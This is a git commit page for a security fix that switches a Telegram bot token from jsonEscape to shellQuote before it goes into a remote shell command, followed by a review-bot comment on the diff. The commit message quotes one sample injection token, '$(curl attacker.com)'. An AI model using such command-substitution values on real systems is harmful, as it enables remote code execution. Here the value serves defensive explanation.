security: use shellQuote for Telegram bot token in shell command (#2561)

jsonEscape() produces double-quoted strings ("value") which allow
shell command substitution $(...) inside bash. A malicious
TELEGRAM_BOT_TOKEN like "$(curl attacker.com)" would execute on
the remote VM when openclaw config is set.

shellQuote() uses POSIX single-quote escaping which prevents all
shell expansion. Every other user-supplied value in agent-setup.ts
(GITHUB_TOKEN, git user.name, git user.email) correctly uses
shellQuote — the bot token was the only exception.

Agent: security-auditor

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
A 2026-03-12 22:51:33 -07:00 committed by GitHub
parent d578e614e2
commit 370afb631c
No known key found for this signature in database
GPG key ID: B5690EEEBB952194


@ -378,7 +378,7 @@ async function setupOpenclawConfig(
const trimmedToken = envToken?.trim() || (await prompt("Telegram bot token: ")).trim();
if (trimmedToken) {
const escapedBotToken = jsonEscape(trimmedToken);
const escapedBotToken = shellQuote(trimmedToken);
const telegramResult = await asyncTryCatchIf(isOperationalError, () =>
runner.runServer(
"export PATH=$HOME/.npm-global/bin:$HOME/.bun/bin:$HOME/.local/bin:$PATH; " +
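Review bot: the hunk swaps jsonEscape for shellQuote on the escapedBotToken line but the trailing context stops before the line where escapedBotToken is interpolated into the runServer command string, so a reviewer cannot confirm from this diff alone that the consumer expects a shell-quoted word rather than a JSON string literal; if the old jsonEscape output ("value") was being embedded into a JSON argument for openclaw config, the new single-quoted form changes what the config command receives. Suggest extending the hunk context to include the use site, and adding a unit test for setupOpenclawConfig with a token containing `$(`, backticks and a single quote to assert the resulting command string contains no unquoted expansion. Note also that the visible `export PATH=$HOME/...` prefix relies on shell expansion of $HOME, so the quoting must apply only to the token, not the whole command.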